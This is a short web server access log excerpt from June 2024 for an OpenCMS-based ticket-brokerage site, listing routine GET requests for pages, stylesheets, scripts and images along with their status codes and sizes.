85.27.201.41 - - [19/Jun/2024:23:45:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
54.36.148.123 - - [19/Jun/2024:23:45:12 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B HTTP/1.1" 200 83610
135.181.213.220 - - [19/Jun/2024:23:45:14 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/premier-league/huddersfield/ HTTP/1.1" 404 -
82.170.137.97 - - [19/Jun/2024:23:45:18 +0200] "GET /ticket2/opencms/img/arrow-up.png HTTP/1.1" 200 193
135.181.213.220 - - [19/Jun/2024:23:45:19 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/premier-league/leicester/ HTTP/1.1" 404 -
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=/dk/buy/index.html%3Fpage%3D1%26edid%3D8D7E4EA3-ED35-1CF7-A7BE-8DD27899E495%26hlv%3D65ba1071-f1f0-4e3a-9a61-118f0a01000f%23v945412564 HTTP/1.1" 200 224
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=8D7E4EA3-ED35-1CF7-A7BE-8DD27899E495&hlv=65ba1071-f1f0-4e3a-9a61-118f0a01000f HTTP/1.1" 200 97021
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
85.27.201.41 - - [19/Jun/2024:23:45:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
